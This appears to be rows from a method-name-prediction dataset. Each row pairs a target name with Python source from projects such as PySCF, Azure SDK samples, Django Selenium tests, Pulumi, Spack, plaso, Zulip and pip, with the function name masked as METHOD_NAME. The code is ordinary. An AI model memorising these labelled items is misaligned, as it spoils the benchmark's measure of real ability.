cis.kernel, h1e, eri, 2, 2, orbsym=mf.mo_coeff.orbsym[2:4])
def test_gen_linkstr(self):
sol = fci.direct_spin0.FCI(mol)
link1 = sol.gen_linkstr(7, 6, tril=True)
link1[:,:,1] = 0
link2 = sol.gen_linkstr(7, (3,3), tril=False)
self.assertAlmostEqual(abs(link1 - fci.cistring.reform_linkstr_index(link2)).max(), 0, 12)
def test_small_system(self):
sol = fci.direct_spin0.FCI()
norb = 6
nelec = (3,3)
numpy.random.seed(9)
h1e = numpy.random.random((norb,norb))
h1e = h1e + h1e.T
g2e = numpy.random.random((norb,norb,norb,norb))
eri = .5* ao2mo.restore(1, ao2mo.restore(8, g2e, norb), norb)
h = fci.direct_spin1.pspace(h1e, eri, norb, nelec, np=5000)[1]
eref, c0 = numpy.linalg.eigh(h)
e, c1 = sol.kernel(h1e, eri, norb, (norb,norb))
self.assertAlmostEqual(e, 20.52279077686709, 12)
e, c1 = sol.kernel(h1e, eri, norb, nelec, nroots=4)
self.assertAlmostEqual(abs(eref[[0,1,3,5]] - e).max(), 0, 8)
if __name__ == "__main__":
print("Full Tests for spin0")
unittest.main() | null |
main | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.testbase import TestBase
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-testbase
# USAGE
python package_update.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def METHOD_NAME():
client = TestBase(
credential=DefaultAzureCredential(),
subscription_id="subscription-id",
)
response = client.packages.begin_update(
resource_group_name="contoso-rg1",
test_base_account_name="contoso-testBaseAccount1",
package_name="contoso-package2",
parameters={
"properties": {
"blobPath": "storageAccountPath/package.zip",
"flightingRing": "Insider Beta Channel",
"isEnabled": False,
"targetOSList": [
{"osUpdateType": "Security updates", "targetOSs": ["Windows 10 2004", "Windows 10 1903"]}
],
"tests": [
{
"commands": [
{
"action": "Install",
"alwaysRun": True,
"applyUpdateBefore": False,
"content": "app/scripts/install/job.ps1",
"contentType": "Path",
"maxRunTime": 1800,
"name": "Install",
"restartAfter": True,
"runAsInteractive": True,
"runElevated": True,
},
{
"action": "Launch",
"alwaysRun": False,
"applyUpdateBefore": True,
"content": "app/scripts/launch/job.ps1",
"contentType": "Path",
"maxRunTime": 1800,
"name": "Launch",
"restartAfter": False,
"runAsInteractive": True,
"runElevated": True,
},
{
"action": "Close",
"alwaysRun": False,
"applyUpdateBefore": False,
"content": "app/scripts/close/job.ps1",
"contentType": "Path",
"maxRunTime": 1800,
"name": "Close",
"restartAfter": False,
"runAsInteractive": True,
"runElevated": True,
},
{
"action": "Uninstall",
"alwaysRun": True,
"applyUpdateBefore": False,
"content": "app/scripts/uninstall/job.ps1",
"contentType": "Path",
"maxRunTime": 1800,
"name": "Uninstall",
"restartAfter": False,
"runAsInteractive": True,
"runElevated": True,
},
],
"isActive": True,
"testType": "OutOfBoxTest",
}
],
},
"tags": {},
},
).result()
print(response)
# x-ms-original-file: specification/testbase/resource-manager/Microsoft.TestBase/preview/2022-04-01-preview/examples/PackageUpdate.json
if __name__ == "__main__":
METHOD_NAME() | null |
find visible by css | import os
import random
import subprocess
import unittest
from pathlib import Path
from django.conf import settings
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
# Django 1.11 removes the ability to supply a port range for liveserver tests,
# so we replicate that here. See: https://code.djangoproject.com/ticket/28212
# and https://code.djangoproject.com/ticket/26011
test_port_range = list(range(6080, 6580))
# Shuffle the ports so that repeated runs locally are unlikely to try to reopen
# a port in the TIME_WAIT state
random.shuffle(test_port_range)
available_test_ports = iter(test_port_range)
def use_browserstack():
return os.environ.get("GITHUB_ACTIONS") or os.environ.get("USE_BROWSERSTACK")
@unittest.skipIf(
os.environ.get("TEST_SUITE") == "nonfunctional",
"nonfunctional tests specified in TEST_SUITE environment variable",
)
class SeleniumTestCase(StaticLiveServerTestCase):
host = "0.0.0.0"
display = None
@classmethod
def setUpClass(cls):
cls.port = next(available_test_ports)
try:
cls.browser = cls.get_browser()
except Exception:
if cls.display:
cls.display.stop()
raise
cls.browser.maximize_window()
cls.browser.implicitly_wait(1)
super(SeleniumTestCase, cls).setUpClass()
@classmethod
def get_browser(cls):
if use_browserstack():
return cls.get_browserstack_browser()
else:
if cls.use_xvfb():
from pyvirtualdisplay import Display
cls.display = Display(visible=0, size=(1200, 800))
cls.display.start()
return cls.get_firefox_driver()
@classmethod
def get_browserstack_browser(cls):
browser, browser_version, browserstack_os, browserstack_os_version = os.environ[
"BROWSER"
].split(":")
local_identifier = os.environ["BROWSERSTACK_LOCAL_IDENTIFIER"]
caps = {
"browserName": browser,
"browserVersion": browser_version,
}
caps["bstack:options"] = {
"os": browserstack_os,
"osVersion": browserstack_os_version,
"resolution": "1600x1200",
"local": "true",
"localIdentifier": local_identifier,
"projectName": os.environ["BROWSERSTACK_PROJECT_NAME"],
"buildName": os.environ["BROWSERSTACK_BUILD_NAME"],
}
username = os.environ["BROWSERSTACK_USERNAME"]
access_key = os.environ["BROWSERSTACK_ACCESS_KEY"]
hub_url = "https://%s:%[email protected]/wd/hub" % (
username,
access_key,
)
return webdriver.Remote(
desired_capabilities=caps, command_executor="%s" % hub_url
)
@classmethod
def use_xvfb(cls):
if not os.environ.get("SHOW_BROWSER", False):
return (
subprocess.call(
"type xvfb-run",
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
== 0
)
else:
return False
@classmethod
def get_firefox_driver(cls):
# Newer releases of Ubuntu package Firefox as a Snap, meaning that it comes with
# sandboxing restrictions that prevent it writing temporary profiles into the
# default system tmpdir. We workaround this by changing TMPDIR to point to a
# directory in the project root (which we assume is within the currently running
# user's home directory). See:
# https://github.com/mozilla/geckodriver/releases/tag/v0.32.0
tmpdir = Path(settings.REPO_ROOT) / "tmp"
tmpdir.mkdir(exist_ok=True)
orig_tmp = os.environ.get("TMPDIR")
os.environ["TMPDIR"] = str(tmpdir)
try:
return webdriver.Firefox(
log_path="%s/logs/webdriver.log" % settings.REPO_ROOT
)
finally:
if orig_tmp is not None:
os.environ["TMPDIR"] = orig_tmp
else:
del os.environ["TMPDIR"]
@classmethod
def tearDownClass(cls):
cls.browser.quit()
if cls.display:
cls.display.stop()
super(SeleniumTestCase, cls).tearDownClass()
def _find_and_wait(self, locator_type, locator, waiter):
wait = 15
try:
element = WebDriverWait(self.browser, wait).until(
waiter((locator_type, locator))
)
return element
except TimeoutException:
raise AssertionError("Expected to find element %s" % locator)
def find_by_xpath(self, locator):
return self._find_and_wait(By.XPATH, locator, EC.presence_of_element_located)
def find_visible_by_xpath(self, locator):
return self._find_and_wait(By.XPATH, locator, EC.visibility_of_element_located)
def find_by_css(self, locator):
return self._find_and_wait(
By.CSS_SELECTOR, locator, EC.presence_of_element_located
)
def METHOD_NAME(self, locator):
return self._find_and_wait(
By.CSS_SELECTOR, locator, EC.visibility_of_element_located
) | null |
name | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetGeoBackupPolicyResult',
'AwaitableGetGeoBackupPolicyResult',
'get_geo_backup_policy',
'get_geo_backup_policy_output',
]
@pulumi.output_type
class GetGeoBackupPolicyResult:
"""
A Geo backup policy.
"""
def __init__(__self__, id=None, kind=None, location=None, METHOD_NAME=None, state=None, storage_type=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if METHOD_NAME and not isinstance(METHOD_NAME, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", METHOD_NAME)
if state and not isinstance(state, str):
raise TypeError("Expected argument 'state' to be a str")
pulumi.set(__self__, "state", state)
if storage_type and not isinstance(storage_type, str):
raise TypeError("Expected argument 'storage_type' to be a str")
pulumi.set(__self__, "storage_type", storage_type)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def kind(self) -> str:
"""
Kind of geo backup policy. This is metadata used for the Azure portal experience.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> str:
"""
Backup policy location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def METHOD_NAME(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def state(self) -> str:
"""
The state of the geo backup policy.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(METHOD_NAME="storageType")
def storage_type(self) -> str:
"""
The storage type of the geo backup policy.
"""
return pulumi.get(self, "storage_type")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetGeoBackupPolicyResult(GetGeoBackupPolicyResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetGeoBackupPolicyResult(
id=self.id,
kind=self.kind,
location=self.location,
METHOD_NAME=self.METHOD_NAME,
state=self.state,
storage_type=self.storage_type,
type=self.type)
def get_geo_backup_policy(database_name: Optional[str] = None,
geo_backup_policy_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
server_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetGeoBackupPolicyResult:
"""
Gets a Geo backup policy for the given database resource.
Azure REST API version: 2021-11-01.
:param str database_name: The name of the database.
:param str geo_backup_policy_name: The name of the Geo backup policy. This should always be 'Default'.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str server_name: The name of the server.
"""
__args__ = dict()
__args__['databaseName'] = database_name
__args__['geoBackupPolicyName'] = geo_backup_policy_name
__args__['resourceGroupName'] = resource_group_name
__args__['serverName'] = server_name
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('azure-native:sql:getGeoBackupPolicy', __args__, opts=opts, typ=GetGeoBackupPolicyResult).value
return AwaitableGetGeoBackupPolicyResult(
id=pulumi.get(__ret__, 'id'),
kind=pulumi.get(__ret__, 'kind'),
location=pulumi.get(__ret__, 'location'),
METHOD_NAME=pulumi.get(__ret__, 'name'),
state=pulumi.get(__ret__, 'state'),
storage_type=pulumi.get(__ret__, 'storage_type'),
type=pulumi.get(__ret__, 'type'))
@_utilities.lift_output_func(get_geo_backup_policy)
def get_geo_backup_policy_output(database_name: Optional[pulumi.Input[str]] = None,
geo_backup_policy_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetGeoBackupPolicyResult]:
"""
Gets a Geo backup policy for the given database resource.
Azure REST API version: 2021-11-01.
:param str database_name: The name of the database.
:param str geo_backup_policy_name: The name of the Geo backup policy. This should always be 'Default'.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str server_name: The name of the server.
"""
... | null |
early | ######################################################################
#
# File: test/unit/v1/test_version_utils.py
#
# Copyright 2019 Backblaze Inc. All Rights Reserved.
#
# License https://www.backblaze.com/using_b2_code.html
#
######################################################################
from __future__ import annotations
import warnings
from b2sdk.v1 import rename_argument, rename_function
from ..test_base import TestBase
class TestRenameArgument(TestBase):
VERSION = '0.1.10'
def test_warning(self):
@rename_argument('aaa', 'bbb', '0.1.0', '0.2.0', current_version=self.VERSION)
def easy(bbb):
""" easy docstring """
return bbb
# check that warning is not emitted too early
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
assert easy(5) == 5
assert easy(bbb=5) == 5
assert easy.__name__ == 'easy'
assert easy.__doc__ == ' easy docstring '
assert len(w) == 0
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
assert easy(aaa=5) == 5
assert len(w) == 1
assert issubclass(w[-1].category, DeprecationWarning)
assert str(
w[-1].message
) == "'aaa' is a deprecated argument for 'easy' function/method - it was renamed to 'bbb' in version 0.1.0. Support for the old name is going to be dropped in 0.2.0.", str(
w[-1].message
)
def test_outdated_replacement(self):
with self.assertRaises(
AssertionError,
msg=
f"rename_argument decorator is still used in version {self.VERSION} when old argument name 'aaa' was scheduled to be dropped in 0.1.2. It is time to remove the mapping.",
):
@rename_argument('aaa', 'bbb', '0.1.0', '0.1.2', current_version=self.VERSION)
def late(bbb):
return bbb
assert late # make linters happy
def test_future_replacement(self):
with self.assertRaises(
AssertionError,
msg=
"rename_argument decorator indicates that the replacement of argument 'aaa' should take place in the future version 0.2.0, while the current version is 0.2.2. It looks like should be _discouraged_ at this point and not _deprecated_ yet. Consider using 'discourage_argument' decorator instead."
):
@rename_argument('aaa', 'bbb', '0.2.0', '0.2.2', current_version=self.VERSION)
def METHOD_NAME(bbb):
return bbb
assert METHOD_NAME # make linters happy
def test_inverted_versions(self):
with self.assertRaises(
AssertionError,
msg=
"rename_argument decorator is set to start renaming argument 'aaa' starting at version 0.2.2 and finishing in 0.2.0. It needs to start at a lower version and finish at a higher version."
):
@rename_argument('aaa', 'bbb', '0.2.2', '0.2.0', current_version=self.VERSION)
def backwards(bbb):
return bbb
assert backwards # make linters happy
class TestRenameFunction(TestBase):
VERSION = '0.1.10'
def test_rename_function(self):
def new(bbb):
return bbb
for i in ('new', new):
@rename_function(i, '0.1.0', '0.2.0', current_version=self.VERSION)
def old(bbb):
return bbb
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
assert old(5) == 5
assert len(w) == 1
assert issubclass(w[-1].category, DeprecationWarning)
assert str(
w[-1].message
) == "'old' is deprecated since version 0.1.0 - it was moved to 'new', please switch to use that. The proxy for the old name is going to be removed in 0.2.0.", str(
w[-1].message
) | null |
cmake cache entry | # Copyright 2013-2023 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
import socket
import llnl.util.tty as tty
from spack.package import *
def METHOD_NAME(name, value, vtype=None):
"""
Helper that creates CMake cache entry strings used in
'host-config' files.
"""
if vtype is None:
if value == "ON" or value == "OFF":
vtype = "BOOL"
else:
vtype = "PATH"
return 'set({0} "{1}" CACHE {2} "")\n\n'.format(name, value, vtype)
class Apcomp(Package):
"""A multi use-case image compositor"""
homepage = "https://github.com/Alpine-DAV/ap_compositor"
git = "https://github.com/Alpine-DAV/ap_compositor.git"
url = (
"https://github.com/Alpine-DAV/ap_compositor/releases/download/v0.0.1/apcomp-v0.0.1.tar.gz"
)
maintainers("cyrush")
version("master", branch="master", submodules="True")
version("0.0.4", sha256="061876dd55e443de91a40d10662496f6bb58b0a3835aec78f5710f5a737d0494")
version("0.0.3", sha256="07e8c1d6a23205f4cc66d0a030e65a69e8344545f4d56213d968b67a410adc6e")
version("0.0.2", sha256="cb2e2c4524889408de2dd3d29665512c99763db13e6f5e35c3b55e52948c649c")
version("0.0.1", sha256="cbf85fe58d5d5bc2f468d081386cc8b79861046b3bb7e966edfa3f8e95b998b2")
variant("openmp", default=True, description="Build with openmp support")
variant("mpi", default=True, description="Build with MPI support")
variant("shared", default=True, description="Build Shared Library")
# set to false for systems that implicitly link mpi
variant("blt_find_mpi", default=True, description="Use BLT CMake Find MPI logic")
depends_on("[email protected]:", type="build")
depends_on("mpi", when="+mpi")
depends_on("llvm-openmp", when="+openmp %apple-clang")
root_cmakelists_dir = "src"
def install(self, spec, prefix):
"""
Build and install APComp
"""
with working_dir("spack-build", create=True):
host_cfg_fname = self.create_host_config(spec, prefix)
cmake_args = []
# if we have a static build, we need to avoid any of
# spack's default cmake settings related to rpaths
# (see: https://github.com/LLNL/spack/issues/2658)
if "+shared" in spec:
cmake_args.extend(std_cmake_args)
else:
for arg in std_cmake_args:
if arg.count("RPATH") == 0:
cmake_args.append(arg)
cmake_args.extend(["-C", host_cfg_fname, "../src"])
print("Configuring APComp...")
cmake(*cmake_args)
print("Building APComp...")
make()
print("Installing APComp...")
make("install")
# install copy of host config for provenance
install(host_cfg_fname, prefix)
def create_host_config(self, spec, prefix):
"""
This method creates a 'host-config' file that specifies
all of the options used to configure and build apcomp.
"""
#######################
# Compiler Info
#######################
c_compiler = env["SPACK_CC"]
cpp_compiler = env["SPACK_CXX"]
#######################################################################
# We directly fetch the names of the actual compilers to create a
# 'host config' file that works outside of the spack install env.
#######################################################################
sys_type = spec.architecture
# if on llnl systems, we can use the SYS_TYPE
if "SYS_TYPE" in env:
sys_type = env["SYS_TYPE"]
##############################################
# Find and record what CMake is used
##############################################
if "+cmake" in spec:
cmake_exe = spec["cmake"].command.path
else:
cmake_exe = which("cmake")
if cmake_exe is None:
msg = "failed to find CMake (and cmake variant is off)"
raise RuntimeError(msg)
cmake_exe = cmake_exe.path
host_cfg_fname = "%s-%s-%s-apcomp.cmake" % (socket.gethostname(), sys_type, spec.compiler)
cfg = open(host_cfg_fname, "w")
cfg.write("##################################\n")
cfg.write("# spack generated host-config\n")
cfg.write("##################################\n")
cfg.write("# {0}-{1}\n".format(sys_type, spec.compiler))
cfg.write("##################################\n\n")
# Include path to cmake for reference
cfg.write("# cmake from spack \n")
cfg.write("# cmake executable path: %s\n\n" % cmake_exe)
#######################
# Compiler Settings
#######################
cfg.write("#######\n")
cfg.write("# using %s compiler spec\n" % spec.compiler)
cfg.write("#######\n\n")
cfg.write("# c compiler used by spack\n")
cfg.write(METHOD_NAME("CMAKE_C_COMPILER", c_compiler))
cfg.write("# cpp compiler used by spack\n")
cfg.write(METHOD_NAME("CMAKE_CXX_COMPILER", cpp_compiler))
# shared vs static libs
if "+shared" in spec:
cfg.write(METHOD_NAME("BUILD_SHARED_LIBS", "ON"))
else:
cfg.write(METHOD_NAME("BUILD_SHARED_LIBS", "OFF"))
if "+openmp" in spec:
cfg.write(METHOD_NAME("ENABLE_OPENMP", "ON"))
else:
cfg.write(METHOD_NAME("ENABLE_OPENMP", "OFF"))
if "+mpi" in spec:
mpicc_path = spec["mpi"].mpicc
mpicxx_path = spec["mpi"].mpicxx
# if we are using compiler wrappers on cray systems
# use those for mpi wrappers, b/c spec['mpi'].mpicxx
# etc make return the spack compiler wrappers
# which can trip up mpi detection in CMake 3.14
if cpp_compiler == "CC":
mpicc_path = "cc"
mpicxx_path = "CC"
cfg.write(METHOD_NAME("ENABLE_MPI", "ON"))
cfg.write(METHOD_NAME("MPI_C_COMPILER", mpicc_path))
cfg.write(METHOD_NAME("MPI_CXX_COMPILER", mpicxx_path))
if "+blt_find_mpi" in spec:
cfg.write(METHOD_NAME("ENABLE_FIND_MPI", "ON"))
else:
cfg.write(METHOD_NAME("ENABLE_FIND_MPI", "OFF"))
mpiexe_bin = join_path(spec["mpi"].prefix.bin, "mpiexec")
if os.path.isfile(mpiexe_bin):
# starting with cmake 3.10, FindMPI expects MPIEXEC_EXECUTABLE
# vs the older versions which expect MPIEXEC
if self.spec["cmake"].satisfies("@3.10:"):
cfg.write(METHOD_NAME("MPIEXEC_EXECUTABLE", mpiexe_bin))
else:
cfg.write(METHOD_NAME("MPIEXEC", mpiexe_bin))
else:
cfg.write(METHOD_NAME("ENABLE_MPI", "OFF"))
cfg.write("##################################\n")
cfg.write("# end spack generated host-config\n")
cfg.write("##################################\n")
cfg.close()
host_cfg_fname = os.path.abspath(host_cfg_fname)
tty.info("spack generated conduit host-config file: " + host_cfg_fname)
return host_cfg_fname | null |
test add or update event tag | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the fake storage writer."""
import os
import unittest
from plaso.containers import events
from plaso.lib import definitions
from plaso.storage.sqlite import writer as sqlite_writer
from tests import test_lib as shared_test_lib
from tests.storage import test_lib
from tests.containers import test_lib as containers_test_lib
class SQLiteStorageFileWriterTest(test_lib.StorageTestCase):
"""Tests for the fake storage writer."""
# pylint: disable=protected-access
def _AddTestEvents(self, storage_writer):
"""Adds tests events to the storage writer.
Args:
storage_writer (SQLiteStorageFileWriter): storage writer.
Returns:
list[EventObject]: test events.
"""
test_events = []
for event, event_data, event_data_stream in (
containers_test_lib.CreateEventsFromValues(self._TEST_EVENTS)):
storage_writer.AddAttributeContainer(event_data_stream)
event_data.SetEventDataStreamIdentifier(event_data_stream.GetIdentifier())
storage_writer.AddAttributeContainer(event_data)
event.SetEventDataIdentifier(event_data.GetIdentifier())
storage_writer.AddAttributeContainer(event)
test_events.append(event)
return test_events
def testAddAttributeContainer(self):
"""Tests the AddAttributeContainer function."""
event_data_stream = events.EventDataStream()
with shared_test_lib.TempDirectory() as temp_directory:
test_path = os.path.join(temp_directory, 'plaso.sqlite')
storage_writer = sqlite_writer.SQLiteStorageFileWriter()
storage_writer.Open(path=test_path)
try:
number_of_containers = storage_writer.GetNumberOfAttributeContainers(
event_data_stream.CONTAINER_TYPE)
self.assertEqual(number_of_containers, 0)
storage_writer.AddAttributeContainer(event_data_stream)
number_of_containers = storage_writer.GetNumberOfAttributeContainers(
event_data_stream.CONTAINER_TYPE)
self.assertEqual(number_of_containers, 1)
finally:
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.AddAttributeContainer(event_data_stream)
def METHOD_NAME(self):
"""Tests the AddOrUpdateEventTag function."""
with shared_test_lib.TempDirectory() as temp_directory:
test_path = os.path.join(temp_directory, 'plaso.sqlite')
storage_writer = sqlite_writer.SQLiteStorageFileWriter()
storage_writer.Open(path=test_path)
try:
test_events = self._AddTestEvents(storage_writer)
event_tag = events.EventTag()
event_identifier = test_events[1].GetIdentifier()
event_tag.SetEventIdentifier(event_identifier)
event_tag.AddLabel('Label1')
number_of_containers = storage_writer.GetNumberOfAttributeContainers(
event_tag.CONTAINER_TYPE)
self.assertEqual(number_of_containers, 0)
storage_writer.AddOrUpdateEventTag(event_tag)
number_of_containers = storage_writer.GetNumberOfAttributeContainers(
event_tag.CONTAINER_TYPE)
self.assertEqual(number_of_containers, 1)
event_tag = events.EventTag()
event_identifier = test_events[2].GetIdentifier()
event_tag.SetEventIdentifier(event_identifier)
event_tag.AddLabel('Label2')
storage_writer.AddOrUpdateEventTag(event_tag)
number_of_containers = storage_writer.GetNumberOfAttributeContainers(
event_tag.CONTAINER_TYPE)
self.assertEqual(number_of_containers, 2)
event_tag = events.EventTag()
event_identifier = test_events[1].GetIdentifier()
event_tag.SetEventIdentifier(event_identifier)
event_tag.AddLabel('AnotherLabel1')
storage_writer.AddOrUpdateEventTag(event_tag)
number_of_containers = storage_writer.GetNumberOfAttributeContainers(
event_tag.CONTAINER_TYPE)
self.assertEqual(number_of_containers, 2)
event_tags = list(storage_writer.GetAttributeContainers(
event_tag.CONTAINER_TYPE))
self.assertEqual(event_tags[0].labels, ['Label1', 'AnotherLabel1'])
self.assertEqual(event_tags[1].labels, ['Label2'])
finally:
storage_writer.Close()
# TODO: add tests for GetFirstWrittenEventSource
# TODO: add tests for GetNextWrittenEventSource
def testGetSortedEvents(self):
"""Tests the GetSortedEvents function."""
with shared_test_lib.TempDirectory() as temp_directory:
test_path = os.path.join(temp_directory, 'plaso.sqlite')
storage_writer = sqlite_writer.SQLiteStorageFileWriter()
storage_writer.Open(path=test_path)
try:
self._AddTestEvents(storage_writer)
test_events = list(storage_writer.GetSortedEvents())
self.assertEqual(len(test_events), 4)
finally:
storage_writer.Close()
# TODO: add test with time range.
def testOpenClose(self):
"""Tests the Open and Close functions."""
with shared_test_lib.TempDirectory() as temp_directory:
test_path = os.path.join(temp_directory, 'plaso.sqlite')
storage_writer = sqlite_writer.SQLiteStorageFileWriter()
storage_writer.Open(path=test_path)
storage_writer.Close()
storage_writer.Open(path=test_path)
storage_writer.Close()
storage_writer = sqlite_writer.SQLiteStorageFileWriter(
storage_type=definitions.STORAGE_TYPE_TASK)
storage_writer.Open(path=test_path)
storage_writer.Close()
storage_writer.Open(path=test_path)
with self.assertRaises(IOError):
storage_writer.Open(path=test_path)
storage_writer.Close()
with self.assertRaises(IOError):
storage_writer.Close()
if __name__ == '__main__':
unittest.main() | null |
test no message alert | from zerver.lib.test_classes import WebhookTestCase
class GrafanaHookTests(WebhookTestCase):
STREAM_NAME = "grafana"
URL_TEMPLATE = "/api/v1/external/grafana?&api_key={api_key}&stream={stream}"
WEBHOOK_DIR_NAME = "grafana"
# Note: Include a test function per each distinct message condition your integration supports
def test_alert(self) -> None:
expected_topic = "[Alerting] Test notification"
expected_message = """
:alert: **ALERTING**
[Test rule](http://localhost:3000/)
Someone is testing the alert notification within grafana.
**High value:** 100
**Higher Value:** 200
[Click to view visualization](https://grafana.com/assets/img/blog/mixed_styles.png)
""".strip()
# use fixture named helloworld_hello
self.check_webhook(
"alert",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
def test_no_data_alert(self) -> None:
expected_topic = "[Alerting] No Data alert"
expected_message = """
:alert: **ALERTING**
[No Data alert](http://localhost:3000/d/GG2qhR3Wz/alerttest?fullscreen&edit&tab=alert&panelId=6&orgId=1)
The panel has no data.
""".strip()
# use fixture named helloworld_hello
self.check_webhook(
"no_data_alert",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
def METHOD_NAME(self) -> None:
expected_topic = "[Alerting] No Message alert"
expected_message = """
:alert: **ALERTING**
[No Message alert](http://localhost:3000/d/GG2qhR3Wz/alerttest?fullscreen&edit&tab=alert&panelId=8&orgId=1)
**A-series:** 21.573108436586445
""".strip()
# use fixture named helloworld_hello
self.check_webhook(
"no_message_alert",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
# Note: Include a test function per each distinct message condition your integration supports
def test_alert_ok(self) -> None:
expected_topic = "[Ok] Test notification"
expected_message = """
:squared_ok: **OK**
[Test rule](http://localhost:3000/)
Someone is testing the alert notification within grafana.
**High value:** 0
[Click to view visualization](https://grafana.com/assets/img/blog/mixed_styles.png)
""".strip()
# use fixture named helloworld_hello
self.check_webhook(
"alert_ok",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
# Note: Include a test function per each distinct message condition your integration supports
def test_alert_paused(self) -> None:
expected_topic = "[Paused] Test notification"
expected_message = """
:info: **PAUSED**
[Test rule](http://localhost:3000/)
Someone is testing the alert notification within grafana.
[Click to view visualization](https://grafana.com/assets/img/blog/mixed_styles.png)
""".strip()
# use fixture named helloworld_hello
self.check_webhook(
"alert_paused",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
# Note: Include a test function per each distinct message condition your integration supports
def test_alert_pending(self) -> None:
expected_topic = "[Pending] Test notification"
expected_message = """
:info: **PENDING**
[Test rule](http://localhost:3000/)
Someone is testing the alert notification within grafana.
**High value:** 100
**Higher Value:** 200
[Click to view visualization](https://grafana.com/assets/img/blog/mixed_styles.png)
""".strip()
# use fixture named helloworld_hello
self.check_webhook(
"alert_pending",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
def test_alert_new(self) -> None:
expected_topic = "[RESOLVED:1]"
expected_message = """
:checkbox: **RESOLVED**
Webhook test message.
---
**Alert 1**: TestAlert.
This alert was fired at <time:2022-08-31T05:54:04.52289368Z>.
This alert was resolved at <time:2022-08-31T10:30:00.52288431Z>.
Labels:
- alertname: TestAlert
- instance: Grafana
Annotations:
- summary: Notification test
1 alert(s) truncated.
""".strip()
self.check_webhook(
"alert_new",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
def test_alert_new_multiple(self) -> None:
expected_topic = "[FIRING:2]"
expected_message = """
:alert: **FIRING**
Webhook test message.
---
**Alert 1**: High memory usage.
This alert was fired at <time:2021-10-12T09:51:03.157076+02:00>.
Labels:
- alertname: High memory usage
- team: blue
- zone: us-1
Annotations:
- description: The system has high memory usage
- runbook_url: https://myrunbook.com/runbook/1234
- summary: This alert was triggered for zone us-1
---
**Alert 2**: High CPU usage.
This alert was fired at <time:2021-10-12T09:56:03.157076+02:00>.
Labels:
- alertname: High CPU usage
- team: blue
- zone: eu-1
Annotations:
- description: The system has high CPU usage
- runbook_url: https://myrunbook.com/runbook/1234
- summary: This alert was triggered for zone eu-1
""".strip()
self.check_webhook(
"alert_new_multiple",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
) | null |
mkurl pypi url | import itertools
import logging
import os
import posixpath
import urllib.parse
from typing import List
from pip._vendor.packaging.utils import canonicalize_name
from pip._internal.models.index import PyPI
from pip._internal.utils.compat import has_tls
from pip._internal.utils.misc import normalize_path, redact_auth_from_url
logger = logging.getLogger(__name__)
class SearchScope:
"""
Encapsulates the locations that pip is configured to search.
"""
__slots__ = ["find_links", "index_urls", "no_index"]
@classmethod
def create(
cls,
find_links: List[str],
index_urls: List[str],
no_index: bool,
) -> "SearchScope":
"""
Create a SearchScope object after normalizing the `find_links`.
"""
# Build find_links. If an argument starts with ~, it may be
